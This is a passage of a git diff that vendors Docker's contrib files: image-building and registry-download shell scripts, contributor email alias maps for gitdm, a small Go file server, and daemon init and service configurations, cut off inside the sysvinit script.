$builddir +} +trap cleanup EXIT + +# Mount disk image +modprobe nbd max_part=63 +qemu-nbd -rc ${block_device} -P 1 "$disk_image_file" +mkdir "$builddir/disk_image" +mount -o ro ${block_device} "$builddir/disk_image" + +mkdir "$builddir/workdir" +mkdir "$builddir/diff" + +base_image_mounts="" + +# Unpack base image +if [ -n "$docker_base_image" ]; then + mkdir -p "$builddir/base" + docker pull "$docker_base_image" + docker save "$docker_base_image" | tar -xC "$builddir/base" + + image_id=$(docker inspect -f "{{.Id}}" "$docker_base_image") + while [ -n "$image_id" ]; do + mkdir -p "$builddir/base/$image_id/layer" + tar -xf "$builddir/base/$image_id/layer.tar" -C "$builddir/base/$image_id/layer" + + base_image_mounts="${base_image_mounts}:$builddir/base/$image_id/layer=ro+wh" + image_id=$(docker inspect -f "{{.Parent}}" "$image_id") + done +fi + +# Mount work directory +mount -t aufs -o "br=$builddir/diff=rw${base_image_mounts},dio,xino=/dev/shm/aufs.xino" none "$builddir/workdir" + +# Update files +cd $builddir +LC_ALL=C diff -rq disk_image workdir \ + | sed -re "s|Only in workdir(.*?): |DEL \1/|g;s|Only in disk_image(.*?): |ADD \1/|g;s|Files disk_image/(.+) and workdir/(.+) differ|UPDATE /\1|g" \ + | while read action entry; do + case "$action" in + ADD|UPDATE) + cp -a "disk_image$entry" "workdir$entry" + ;; + DEL) + rm -rf "workdir$entry" + ;; + *) + echo "Error: unknown diff line: $action $entry" >&2 + ;; + esac + done + +# Pack new image +new_image_id="$(for i in $(seq 1 32); do printf "%02x" $(($RANDOM % 256)); done)" +mkdir -p $builddir/result/$new_image_id +cd diff +tar -cf $builddir/result/$new_image_id/layer.tar * +echo "1.0" > $builddir/result/$new_image_id/VERSION +cat > $builddir/result/$new_image_id/json <<-EOS +{ "docker_version": "1.4.1" +, "id": "$new_image_id" +, "created": "$(date -u +%Y-%m-%dT%H:%M:%S.%NZ)" +EOS + +if [ -n "$docker_base_image" ]; then + image_id=$(docker inspect -f "{{.Id}}" "$docker_base_image") + echo ", \"parent\": \"$image_id\"" >> $builddir/result/$new_image_id/json +fi + +echo "}" >> $builddir/result/$new_image_id/json + +echo "{\"$image_name\":{\"$image_tag\":\"$new_image_id\"}}" > $builddir/result/repositories + +cd $builddir/result + +# mkdir -p $CURDIR/$image_name +# cp -r * $CURDIR/$image_name +tar -c * | docker load diff --git a/vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh b/vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh new file mode 100755 index 0000000000..29d7ff59fd --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh @@ -0,0 +1,108 @@ +#!/bin/bash +set -e + +# hello-world latest ef872312fe1b 3 months ago 910 B +# hello-world latest ef872312fe1bbc5e05aae626791a47ee9b032efa8f3bda39cc0be7b56bfe59b9 3 months ago 910 B + +# debian latest f6fab3b798be 10 weeks ago 85.1 MB +# debian latest f6fab3b798be3174f45aa1eb731f8182705555f89c9026d8c1ef230cbf8301dd 10 weeks ago 85.1 MB + +if ! command -v curl &> /dev/null; then + echo >&2 'error: "curl" not found!' + exit 1 +fi + +usage() { + echo "usage: $0 dir image[:tag][@image-id] ..." + echo " ie: $0 /tmp/hello-world hello-world" + echo " $0 /tmp/debian-jessie debian:jessie" + echo " $0 /tmp/old-hello-world hello-world@ef872312fe1bbc5e05aae626791a47ee9b032efa8f3bda39cc0be7b56bfe59b9" + echo " $0 /tmp/old-debian debian:latest@f6fab3b798be3174f45aa1eb731f8182705555f89c9026d8c1ef230cbf8301dd" + [ -z "$1" ] || exit "$1" +} + +dir="$1" # dir for building tar in +shift || usage 1 >&2 + +[ $# -gt 0 -a "$dir" ] || usage 2 >&2 +mkdir -p "$dir" + +# hacky workarounds for Bash 3 support (no associative arrays) +images=() +rm -f "$dir"/tags-*.tmp +# repositories[busybox]='"latest": "...", "ubuntu-14.04": "..."' + +while [ $# -gt 0 ]; do + imageTag="$1" + shift + image="${imageTag%%[:@]*}" + tag="${imageTag#*:}" + imageId="${tag##*@}" + [ "$imageId" != "$tag" ] || imageId= + [ "$tag" != "$imageTag" ] || tag='latest' + tag="${tag%@*}" + + imageFile="${image//\//_}" # "/" can't be in filenames :) + + token="$(curl -sSL -o /dev/null -D- -H 'X-Docker-Token: true' "https://index.docker.io/v1/repositories/$image/images" | tr -d '\r' | awk -F ': *' '$1 == "X-Docker-Token" { print $2 }')" + + if [ -z "$imageId" ]; then + imageId="$(curl -sSL -H "Authorization: Token $token" "https://registry-1.docker.io/v1/repositories/$image/tags/$tag")" + imageId="${imageId//\"/}" + fi + + ancestryJson="$(curl -sSL -H "Authorization: Token $token" "https://registry-1.docker.io/v1/images/$imageId/ancestry")" + if [ "${ancestryJson:0:1}" != '[' ]; then + echo >&2 "error: /v1/images/$imageId/ancestry returned something unexpected:" + echo >&2 " $ancestryJson" + exit 1 + fi + + IFS=',' + ancestry=( ${ancestryJson//[\[\] \"]/} ) + unset IFS + + if [ -s "$dir/tags-$imageFile.tmp" ]; then + echo -n ', ' >> "$dir/tags-$imageFile.tmp" + else + images=( "${images[@]}" "$image" ) + fi + echo -n '"'"$tag"'": "'"$imageId"'"' >> "$dir/tags-$imageFile.tmp" + + echo "Downloading '$imageTag' (${#ancestry[@]} layers)..." + for imageId in "${ancestry[@]}"; do + mkdir -p "$dir/$imageId" + echo '1.0' > "$dir/$imageId/VERSION" + + curl -sSL -H "Authorization: Token $token" "https://registry-1.docker.io/v1/images/$imageId/json" -o "$dir/$imageId/json" + + # TODO figure out why "-C -" doesn't work here + # "curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume." + # "HTTP/1.1 416 Requested Range Not Satisfiable" + if [ -f "$dir/$imageId/layer.tar" ]; then + # TODO hackpatch for no -C support :'( + echo "skipping existing ${imageId:0:12}" + continue + fi + curl -SL --progress -H "Authorization: Token $token" "https://registry-1.docker.io/v1/images/$imageId/layer" -o "$dir/$imageId/layer.tar" # -C - + done + echo +done + +echo -n '{' > "$dir/repositories" +firstImage=1 +for image in "${images[@]}"; do + imageFile="${image//\//_}" # "/" can't be in filenames :) + + [ "$firstImage" ] || echo -n ',' >> "$dir/repositories" + firstImage= + echo -n $'\n\t' >> "$dir/repositories" + echo -n '"'"$image"'": { '"$(cat "$dir/tags-$imageFile.tmp")"' }' >> "$dir/repositories" +done +echo -n $'\n}\n' >> "$dir/repositories" + +rm -f "$dir"/tags-*.tmp + +echo "Download of images into '$dir' complete." +echo "Use something like the following to load the result into a Docker daemon:" +echo " tar -cC '$dir' . | docker load" diff --git a/vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh b/vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh new file mode 100755 index 0000000000..111e3fa2ba --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh @@ -0,0 +1,121 @@ +#!/bin/bash +set -e + +# hello-world latest ef872312fe1b 3 months ago 910 B +# hello-world latest ef872312fe1bbc5e05aae626791a47ee9b032efa8f3bda39cc0be7b56bfe59b9 3 months ago 910 B + +# debian latest f6fab3b798be 10 weeks ago 85.1 MB +# debian latest f6fab3b798be3174f45aa1eb731f8182705555f89c9026d8c1ef230cbf8301dd 10 weeks ago 85.1 MB + +if ! command -v curl &> /dev/null; then + echo >&2 'error: "curl" not found!' + exit 1 +fi + +usage() { + echo "usage: $0 dir image[:tag][@digest] ..." + echo " $0 /tmp/old-hello-world hello-world:latest@sha256:8be990ef2aeb16dbcb9271ddfe2610fa6658d13f6dfb8bc72074cc1ca36966a7" + [ -z "$1" ] || exit "$1" +} + +dir="$1" # dir for building tar in +shift || usage 1 >&2 + +[ $# -gt 0 -a "$dir" ] || usage 2 >&2 +mkdir -p "$dir" + +# hacky workarounds for Bash 3 support (no associative arrays) +images=() +rm -f "$dir"/tags-*.tmp +# repositories[busybox]='"latest": "...", "ubuntu-14.04": "..."' + +while [ $# -gt 0 ]; do + imageTag="$1" + shift + image="${imageTag%%[:@]*}" + imageTag="${imageTag#*:}" + digest="${imageTag##*@}" + tag="${imageTag%%@*}" + + # add prefix library if passed official image + if [[ "$image" != *"/"* ]]; then + image="library/$image" + fi + + imageFile="${image//\//_}" # "/" can't be in filenames :) + + token="$(curl -sSL "https://auth.docker.io/token?service=registry.docker.io&scope=repository:$image:pull" | jq --raw-output .token)" + + manifestJson="$(curl -sSL -H "Authorization: Bearer $token" "https://registry-1.docker.io/v2/$image/manifests/$digest")" + if [ "${manifestJson:0:1}" != '{' ]; then + echo >&2 "error: /v2/$image/manifests/$digest returned something unexpected:" + echo >&2 " $manifestJson" + exit 1 + fi + + layersFs=$(echo "$manifestJson" | jq --raw-output '.fsLayers | .[] | .blobSum') + + IFS=$'\n' + # bash v4 on Windows CI requires CRLF separator + if [ "$(go env GOHOSTOS)" = 'windows' ]; then + major=$(echo ${BASH_VERSION%%[^0.9]} | cut -d. -f1) + if [ "$major" -ge 4 ]; then + IFS=$'\r\n' + fi + fi + layers=( ${layersFs} ) + unset IFS + + history=$(echo "$manifestJson" | jq '.history | [.[] | .v1Compatibility]') + imageId=$(echo "$history" | jq --raw-output .[0] | jq --raw-output .id) + + if [ -s "$dir/tags-$imageFile.tmp" ]; then + echo -n ', ' >> "$dir/tags-$imageFile.tmp" + else + images=( "${images[@]}" "$image" ) + fi + echo -n '"'"$tag"'": "'"$imageId"'"' >> "$dir/tags-$imageFile.tmp" + + echo "Downloading '${image}:${tag}@${digest}' (${#layers[@]} layers)..." + for i in "${!layers[@]}"; do + imageJson=$(echo "$history" | jq --raw-output .[${i}]) + imageId=$(echo "$imageJson" | jq --raw-output .id) + imageLayer=${layers[$i]} + + mkdir -p "$dir/$imageId" + echo '1.0' > "$dir/$imageId/VERSION" + + echo "$imageJson" > "$dir/$imageId/json" + + # TODO figure out why "-C -" doesn't work here + # "curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume." + # "HTTP/1.1 416 Requested Range Not Satisfiable" + if [ -f "$dir/$imageId/layer.tar" ]; then + # TODO hackpatch for no -C support :'( + echo "skipping existing ${imageId:0:12}" + continue + fi + token="$(curl -sSL "https://auth.docker.io/token?service=registry.docker.io&scope=repository:$image:pull" | jq --raw-output .token)" + curl -SL --progress -H "Authorization: Bearer $token" "https://registry-1.docker.io/v2/$image/blobs/$imageLayer" -o "$dir/$imageId/layer.tar" # -C - + done + echo +done + +echo -n '{' > "$dir/repositories" +firstImage=1 +for image in "${images[@]}"; do + imageFile="${image//\//_}" # "/" can't be in filenames :) + image="${image#library\/}" + + [ "$firstImage" ] || echo -n ',' >> "$dir/repositories" + firstImage= + echo -n $'\n\t' >> "$dir/repositories" + echo -n '"'"$image"'": { '"$(cat "$dir/tags-$imageFile.tmp")"' }' >> "$dir/repositories" +done +echo -n $'\n}\n' >> "$dir/repositories" + +rm -f "$dir"/tags-*.tmp + +echo "Download of images into '$dir' complete." +echo "Use something like the following to load the result into a Docker daemon:" +echo " tar -cC '$dir' . | docker load" diff --git a/vendor/github.com/docker/docker/contrib/editorconfig b/vendor/github.com/docker/docker/contrib/editorconfig new file mode 100644 index 0000000000..97eda89a4b --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/editorconfig @@ -0,0 +1,13 @@ +root = true + +[*] +end_of_line = lf +insert_final_newline = true +charset = utf-8 +indent_style = tab +indent_size = 4 +trim_trailing_whitespace = true + +[*.md] +indent_size = 2 +indent_style = space diff --git a/vendor/github.com/docker/docker/contrib/gitdm/aliases b/vendor/github.com/docker/docker/contrib/gitdm/aliases new file mode 100644 index 0000000000..dd5dd34335 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/gitdm/aliases @@ -0,0 +1,148 @@ +Danny.Yates@mailonline.co.uk danny@codeaholics.org +KenCochrane@gmail.com kencochrane@gmail.com +LÉVEIL thomasleveil@gmail.com +Vincent.Bernat@exoscale.ch bernat@luffy.cx +acidburn@docker.com jess@docker.com +admin@jtlebi.fr jt@yadutaf.fr +ahmetalpbalkan@gmail.com ahmetb@microsoft.com +aj@gandi.net aj@gandi.net +albers@users.noreply.github.com github@albersweb.de +alexander.larsson@gmail.com alexl@redhat.com +amurdaca@redhat.com antonio.murdaca@gmail.com +amy@gandi.net aj@gandi.net +andrew.weiss@microsoft.com andrew.weiss@outlook.com +angt@users.noreply.github.com adrien@gallouet.fr +ankushagarwal@users.noreply.github.com ankushagarwal11@gmail.com +anonymouse2048@gmail.com lheckemann@twig-world.com +anusha@docker.com anusha.ragunathan@docker.com +asarai@suse.com asarai@suse.de +avi.miller@gmail.com avi.miller@oracle.com +bernat@luffy.cx Vincent.Bernat@exoscale.ch +bgoff@cpuguy83-mbp.home cpuguy83@gmail.com +brandon@ifup.co brandon@ifup.org +brent@docker.com brent.salisbury@docker.com +charmes.guillaume@gmail.com guillaume.charmes@docker.com +chenchun.feed@gmail.com ramichen@tencent.com +chooper@plumata.com charles.hooper@dotcloud.com +crosby.michael@gmail.com michael@docker.com +crosbymichael@gmail.com michael@docker.com +cyphar@cyphar.com asarai@suse.de +daehyeok@daehyeok-ui-MacBook-Air.local daehyeok@gmail.com +daehyeok@daehyeokui-MacBook-Air.local daehyeok@gmail.com +daniel.norberg@gmail.com dano@spotify.com +daniel@dotcloud.com daniel.mizyrycki@dotcloud.com +darren@rancher.com darren.s.shepherd@gmail.com +dave@dtucker.co.uk dt@docker.com +dev@vvieux.com victor.vieux@docker.com +dgasienica@zynga.com daniel@gasienica.ch +dnephin@gmail.com dnephin@docker.com +dominikh@fork-bomb.org dominik@honnef.co +dqminh89@gmail.com dqminh@cloudflare.com +dsxiao@dataman-inc.com dxiao@redhat.com +duglin@users.noreply.github.com dug@us.ibm.com +eric.hanchrow@gmail.com ehanchrow@ine.com +erik+github@hollensbe.org github@hollensbe.org +estesp@gmail.com estesp@linux.vnet.ibm.com +ewindisch@docker.com eric@windisch.us +f.joffrey@gmail.com joffrey@docker.com +fkautz@alumni.cmu.edu fkautz@redhat.com +frank.rosquin@gmail.com frank.rosquin+github@gmail.com +gh@mattyw.net mattyw@me.com +git@julienbordellier.com julienbordellier@gmail.com +github@metaliveblog.com github@developersupport.net +github@srid.name sridharr@activestate.com +guillaume.charmes@dotcloud.com guillaume.charmes@docker.com +guillaume@charmes.net guillaume.charmes@docker.com +guillaume@docker.com guillaume.charmes@docker.com +guillaume@dotcloud.com guillaume.charmes@docker.com +haoshuwei24@gmail.com haosw@cn.ibm.com +hollie.teal@docker.com hollie@docker.com +hollietealok@users.noreply.github.com hollie@docker.com +hsinko@users.noreply.github.com 21551195@zju.edu.cn +iamironbob@gmail.com altsysrq@gmail.com +icecrime@gmail.com arnaud.porterie@docker.com +jatzen@gmail.com jacob@jacobatzen.dk +jeff@allingeek.com jeff.nickoloff@gmail.com +jefferya@programmerq.net jeff@docker.com +jerome.petazzoni@dotcloud.com jerome.petazzoni@dotcloud.com +jfrazelle@users.noreply.github.com jess@docker.com +jhoward@microsoft.com John.Howard@microsoft.com +jlhawn@berkeley.edu josh.hawn@docker.com +joffrey@dotcloud.com joffrey@docker.com +john.howard@microsoft.com John.Howard@microsoft.com +jp@enix.org jerome.petazzoni@dotcloud.com +justin.cormack@unikernel.com justin.cormack@docker.com +justin.simonelis@PTS-JSIMON2.toronto.exclamation.com justin.p.simonelis@gmail.com +justin@specialbusservice.com justin.cormack@docker.com +katsuta_soshi@cyberagent.co.jp soshi.katsuta@gmail.com +kuehnle@online.de git.nivoc@neverbox.com +kwk@users.noreply.github.com konrad.wilhelm.kleine@gmail.com +leijitang@gmail.com leijitang@huawei.com +liubin0329@gmail.com liubin0329@users.noreply.github.com +lk4d4math@gmail.com lk4d4@docker.com +louis@dotcloud.com kalessin@kalessin.fr +lsm5@redhat.com lsm5@fedoraproject.org +lyndaoleary@hotmail.com lyndaoleary29@gmail.com +madhu@socketplane.io madhu@docker.com +martins@noironetworks.com aanm90@gmail.com +mary@docker.com mary.anthony@docker.com +mastahyeti@users.noreply.github.com mastahyeti@gmail.com +maztaim@users.noreply.github.com taim@bosboot.org +me@runcom.ninja antonio.murdaca@gmail.com +mheon@mheonlaptop.redhat.com mheon@redhat.com +michael@crosbymichael.com michael@docker.com +mohitsoni1989@gmail.com mosoni@ebay.com +moxieandmore@gmail.com mary.anthony@docker.com +moyses.furtado@wplex.com.br moysesb@gmail.com +msabramo@gmail.com marc@marc-abramowitz.com +mzdaniel@glidelink.net daniel.mizyrycki@dotcloud.com +nathan.leclaire@gmail.com nathan.leclaire@docker.com +nathanleclaire@gmail.com nathan.leclaire@docker.com +ostezer@users.noreply.github.com ostezer@gmail.com +peter@scraperwiki.com p@pwaller.net +princess@docker.com jess@docker.com +proppy@aminche.com proppy@google.com +qhuang@10.0.2.15 h.huangqiang@huawei.com +resouer@gmail.com resouer@163.com +roberto_hashioka@hotmail.com roberto.hashioka@docker.com +root@vagrant-ubuntu-12.10.vagrantup.com daniel.mizyrycki@dotcloud.com +runcom@linux.com antonio.murdaca@gmail.com +runcom@redhat.com antonio.murdaca@gmail.com +runcom@users.noreply.github.com antonio.murdaca@gmail.com +s@docker.com solomon@docker.com +shawnlandden@gmail.com shawn@churchofgit.com +singh.gurjeet@gmail.com gurjeet@singh.im +sjoerd@byte.nl sjoerd-github@linuxonly.nl +smahajan@redhat.com shishir.mahajan@redhat.com +solomon.hykes@dotcloud.com solomon@docker.com +solomon@dotcloud.com solomon@docker.com +stefanb@us.ibm.com stefanb@linux.vnet.ibm.com +stevvooe@users.noreply.github.com stephen.day@docker.com +superbaloo+registrations.github@superbaloo.net baloo@gandi.net +tangicolin@gmail.com tangicolin@gmail.com +thaJeztah@users.noreply.github.com github@gone.nl +thatcher@dotcloud.com thatcher@docker.com +thatcher@gmx.net thatcher@docker.com +tibor@docker.com teabee89@gmail.com +tiborvass@users.noreply.github.com teabee89@gmail.com +timruffles@googlemail.com oi@truffles.me.uk +tintypemolly@Ohui-MacBook-Pro.local tintypemolly@gmail.com +tj@init.me tejesh.mehta@gmail.com +tristan.carel@gmail.com tristan@cogniteev.com +unclejack@users.noreply.github.com cristian.staretu@gmail.com +unclejacksons@gmail.com cristian.staretu@gmail.com +vbatts@hashbangbash.com vbatts@redhat.com +victor.vieux@dotcloud.com victor.vieux@docker.com +victor@docker.com victor.vieux@docker.com +victor@dotcloud.com victor.vieux@docker.com +victorvieux@gmail.com victor.vieux@docker.com +vieux@docker.com victor.vieux@docker.com +vincent+github@demeester.fr vincent@sbr.pm +vincent@bernat.im bernat@luffy.cx +vojnovski@gmail.com viktor.vojnovski@amadeus.com +whoshuu@gmail.com huu@prismskylabs.com +xiaods@gmail.com dxiao@redhat.com +xlgao@zju.edu.cn xlgao@zju.edu.cn +yestin.sun@polyera.com sunyi0804@gmail.com +yuchangchun1@huawei.com yuchangchun1@huawei.com +zjaffee@us.ibm.com zij@case.edu diff --git a/vendor/github.com/docker/docker/contrib/gitdm/domain-map b/vendor/github.com/docker/docker/contrib/gitdm/domain-map new file mode 100644 index 0000000000..1f1849e4f6 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/gitdm/domain-map @@ -0,0 +1,39 @@ +# +# Docker +# + +docker.com Docker +dotcloud.com Docker + +aluzzardi@gmail.com Docker +cpuguy83@gmail.com Docker +derek@mcgstyle.net Docker +github@gone.nl Docker +kencochrane@gmail.com Docker +mickael.laventure@gmail.com Docker +sam.alba@gmail.com Docker +svendowideit@fosiki.com Docker +svendowideit@home.org.au Docker +tonistiigi@gmail.com Docker + +cristian.staretu@gmail.com Docker < 2015-01-01 +cristian.staretu@gmail.com Cisco + +github@hollensbe.org Docker < 2015-01-01 +github@hollensbe.org Cisco + +david.calavera@gmail.com Docker < 2016-04-01 +david.calavera@gmail.com Netlify + +# +# Others +# + +cisco.com Cisco +google.com Google +ibm.com IBM +huawei.com Huawei +microsoft.com Microsoft + +redhat.com Red Hat +mrunalp@gmail.com Red Hat diff --git a/vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh b/vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh new file mode 100755 index 0000000000..dd6a564995 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh @@ -0,0 +1,16 @@ +#!/bin/bash + +# +# This script generates a gitdm compatible email aliases file from a git +# formatted .mailmap file. +# +# Usage: +# $> ./generate_aliases > aliases +# + +cat $1 | \ + grep -v '^#' | \ + sed 's/^[^<]*<\([^>]*\)>/\1/' | \ + grep '<.*>' | sed -e 's/[<>]/ /g' | \ + awk '{if ($3 != "") { print $3" "$1 } else {print $2" "$1}}' | \ + sort | uniq diff --git a/vendor/github.com/docker/docker/contrib/gitdm/gitdm.config b/vendor/github.com/docker/docker/contrib/gitdm/gitdm.config new file mode 100644 index 0000000000..d9b62b0b43 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/gitdm/gitdm.config @@ -0,0 +1,17 @@ +# +# EmailAliases lets us cope with developers who use more +# than one address. +# +EmailAliases aliases + +# +# EmailMap does the main work of mapping addresses onto +# employers. +# +EmailMap domain-map + +# +# Use GroupMap to map a file full of addresses to the +# same employer +# +# GroupMap company-Docker Docker diff --git a/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile b/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile new file mode 100644 index 0000000000..747dc91bcf --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile @@ -0,0 +1,4 @@ +FROM busybox +EXPOSE 80/tcp +COPY httpserver . +CMD ["./httpserver"] diff --git a/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris b/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris new file mode 100644 index 0000000000..3d0d691c17 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris @@ -0,0 +1,4 @@ +FROM solaris +EXPOSE 80/tcp +COPY httpserver . +CMD ["./httpserver"] diff --git a/vendor/github.com/docker/docker/contrib/httpserver/server.go b/vendor/github.com/docker/docker/contrib/httpserver/server.go new file mode 100644 index 0000000000..a75d5abb3d --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/httpserver/server.go @@ -0,0 +1,12 @@ +package main + +import ( + "log" + "net/http" +) + +func main() { + fs := http.FileServer(http.Dir("/static")) + http.Handle("/", fs) + log.Panic(http.ListenAndServe(":80", nil)) +} diff --git a/vendor/github.com/docker/docker/contrib/init/openrc/docker.confd b/vendor/github.com/docker/docker/contrib/init/openrc/docker.confd new file mode 100644 index 0000000000..244403113e --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/openrc/docker.confd @@ -0,0 +1,13 @@ +# /etc/conf.d/docker: config file for /etc/init.d/docker + +# where the docker daemon output gets piped +#DOCKER_LOGFILE="/var/log/docker.log" + +# where docker's pid get stored +#DOCKER_PIDFILE="/run/docker.pid" + +# where the docker daemon itself is run from +#DOCKERD_BINARY="/usr/bin/dockerd" + +# any other random options you want to pass to docker +DOCKER_OPTS="" diff --git a/vendor/github.com/docker/docker/contrib/init/openrc/docker.initd b/vendor/github.com/docker/docker/contrib/init/openrc/docker.initd new file mode 100644 index 0000000000..5d3160338a --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/openrc/docker.initd @@ -0,0 +1,22 @@ +#!/sbin/openrc-run +# Copyright 1999-2013 Gentoo Foundation +# Distributed under the terms of the GNU General Public License v2 + +command="${DOCKERD_BINARY:-/usr/bin/dockerd}" +pidfile="${DOCKER_PIDFILE:-/run/${RC_SVCNAME}.pid}" +command_args="-p \"${pidfile}\" ${DOCKER_OPTS}" +DOCKER_LOGFILE="${DOCKER_LOGFILE:-/var/log/${RC_SVCNAME}.log}" +start_stop_daemon_args="--background \ + --stderr \"${DOCKER_LOGFILE}\" --stdout \"${DOCKER_LOGFILE}\"" + +start_pre() { + checkpath -f -m 0644 -o root:docker "$DOCKER_LOGFILE" + + ulimit -n 1048576 + + # Having non-zero limits causes performance problems due to accounting overhead + # in the kernel. We recommend using cgroups to do container-local accounting. + ulimit -u unlimited + + return 0 +} diff --git a/vendor/github.com/docker/docker/contrib/init/systemd/REVIEWERS b/vendor/github.com/docker/docker/contrib/init/systemd/REVIEWERS new file mode 100644 index 0000000000..b9ba55b3fb --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/systemd/REVIEWERS @@ -0,0 +1,3 @@ +Lokesh Mandvekar (@lsm5) +Brandon Philips (@philips) +Jessie Frazelle (@jfrazelle) diff --git a/vendor/github.com/docker/docker/contrib/init/systemd/docker.service b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service new file mode 100644 index 0000000000..8bfed93c75 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service @@ -0,0 +1,29 @@ +[Unit] +Description=Docker Application Container Engine +Documentation=https://docs.docker.com +After=network.target docker.socket firewalld.service +Requires=docker.socket + +[Service] +Type=notify +# the default is not to use systemd for cgroups because the delegate issues still +# exists and systemd currently does not support the cgroup feature set required +# for containers run by docker +ExecStart=/usr/bin/dockerd -H fd:// +ExecReload=/bin/kill -s HUP $MAINPID +LimitNOFILE=1048576 +# Having non-zero Limit*s causes performance problems due to accounting overhead +# in the kernel. We recommend using cgroups to do container-local accounting. +LimitNPROC=infinity +LimitCORE=infinity +# Uncomment TasksMax if your systemd version supports it. +# Only systemd 226 and above support this version. +#TasksMax=infinity +TimeoutStartSec=0 +# set delegate yes so that systemd does not reset the cgroups of docker containers +Delegate=yes +# kill only the docker process, not all processes in the cgroup +KillMode=process + +[Install] +WantedBy=multi-user.target diff --git a/vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm new file mode 100644 index 0000000000..6e41892399 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm @@ -0,0 +1,28 @@ +[Unit] +Description=Docker Application Container Engine +Documentation=https://docs.docker.com +After=network.target firewalld.service + +[Service] +Type=notify +# the default is not to use systemd for cgroups because the delegate issues still +# exists and systemd currently does not support the cgroup feature set required +# for containers run by docker +ExecStart=/usr/bin/dockerd +ExecReload=/bin/kill -s HUP $MAINPID +# Having non-zero Limit*s causes performance problems due to accounting overhead +# in the kernel. We recommend using cgroups to do container-local accounting. +LimitNOFILE=infinity +LimitNPROC=infinity +LimitCORE=infinity +# Uncomment TasksMax if your systemd version supports it. +# Only systemd 226 and above support this version. +#TasksMax=infinity +TimeoutStartSec=0 +# set delegate yes so that systemd does not reset the cgroups of docker containers +Delegate=yes +# kill only the docker process, not all processes in the cgroup +KillMode=process + +[Install] +WantedBy=multi-user.target diff --git a/vendor/github.com/docker/docker/contrib/init/systemd/docker.socket b/vendor/github.com/docker/docker/contrib/init/systemd/docker.socket new file mode 100644 index 0000000000..7dd95098e4 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/systemd/docker.socket @@ -0,0 +1,12 @@ +[Unit] +Description=Docker Socket for the API +PartOf=docker.service + +[Socket] +ListenStream=/var/run/docker.sock +SocketMode=0660 +SocketUser=root +SocketGroup=docker + +[Install] +WantedBy=sockets.target diff --git a/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker b/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker new file mode 100755 index 0000000000..4f9d38dda5 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker @@ -0,0 +1,152 @@ +#!/bin/sh +set -e + +### BEGIN INIT INFO +# Provides: docker +# Required-Start: $syslog $remote_fs +# Required-Stop: $syslog $remote_fs +# Should-Start: cgroupfs-mount cgroup-lite +# Should-Stop: cgroupfs-mount cgroup-lite +# Default-Start: 2 3 4 5 +# Default-Stop: 0 1 6 +# Short-Description: Create lightweight, portable, self-sufficient containers. +# Description: +# Docker is an open-source project to easily create lightweight, portable, +# self-sufficient containers from any application. The same container that a +# developer builds and tests on a laptop can run at scale, in production, on +# VMs, bare metal, OpenStack clusters, public clouds and more. +### END INIT INFO + +export PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin + +BASE=docker + +# modify these in /etc/default/$BASE (/etc/default/docker) +DOCKERD=/usr/bin/dockerd +# This is the pid file managed by docker itself +DOCKER_PIDFILE=/var/run/$BASE.pid +# This is the pid file created/managed by start-stop-daemon +DOCKER_SSD_PIDFILE=/var/run/$BASE-ssd.pid +DOCKER_LOGFILE=/var/log/$BASE.log +DOCKER_OPTS= +DOCKER_DESC="Docker" + +# Get lsb functions +. /lib/lsb/init-functions + +if [ -f /etc/default/$BASE ]; then + . /etc/default/$BASE +fi + +# Check docker is present +if [ ! -x $DOCKERD ]; then + log_failure_msg "$DOCKERD not present or not executable" + exit 1 +fi + +check_init() { + # see also init_is_upstart in /lib/lsb/init-functions (which isn't available in Ubuntu 12.04, or we'd use it directly) + if [ -x /sbin/initctl ] && /sbin/initctl version 2>/dev/null | grep -q upstart; then + log_failure_msg "$DOCKER_DESC is managed via upstart, try using service $BASE $1" + exit 1 + fi +} + +fail_unless_root() { + if [ "$(id -u)" != '0' ]; then + log_failure_msg "$DOCKER_DESC must be run as root" + exit 1 + fi +} + +cgroupfs_mount() { + # see also https://github.com/tianon/cgroupfs-mount/blob/master/cgroupfs-mount + if grep -v '^#' /etc/fstab | grep -q cgroup \ + || [ ! -e /proc/cgroups ] \ + || [ ! -d /sys/fs/cgroup ]; then + return + fi + if ! mountpoint -q /sys/fs/cgroup; then + mount -t tmpfs -o uid=0,gid=0,mode=0755 cgroup /sys/fs/cgroup + fi + ( + cd /sys/fs/cgroup + for sys in $(awk '!/^#/ { if ($4 == 1) print $1 }' /proc/cgroups); do + mkdir -p $sys + if ! mountpoint -q $sys; then + if ! mount -n -t cgroup -o $sys cgroup $sys; then + rmdir $sys 